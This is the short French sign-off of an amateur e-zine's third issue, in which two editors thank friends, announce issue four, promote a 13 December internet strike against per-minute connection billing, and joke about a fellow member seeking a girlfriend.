Fugitif : Voila ce n° 3 terminé, en route pour le n°4 on attend vos articles par centaines.
Et on espere continuer sur ce chemin...

Cedru : Enfin ce numéro est finit, 3 mois pour boucler ce numéro ca pas été trop long.
Je pense même tenir se rythme pour le numéro 4,des articles sont déjà en préparation.

Je voudrais remercier mes Amis de l'Iut de Src qui m'on inspiré pour le dernier article, ainsi
que le vendeur de Pc de ma ville! :)
Puis Ft avec qui j'ai un contact permanent avec le net et les factures! 
Tient le 13 Decembre journee nationale et meme internationale (angleterre,italie.. ) de greve
du net pour avoir un abonnement et non pas une facturation a la minute comme on a en ce moment.
Donc il faut être solidaire et fermer site et connection internet Dimanche 13 Decembre.
Sinon droopy cherche des femmes car il est frustré sexuellement alors si il y a bien une fille
qui veut le contacter ça serait sympa de sa part!! :) 

The End



























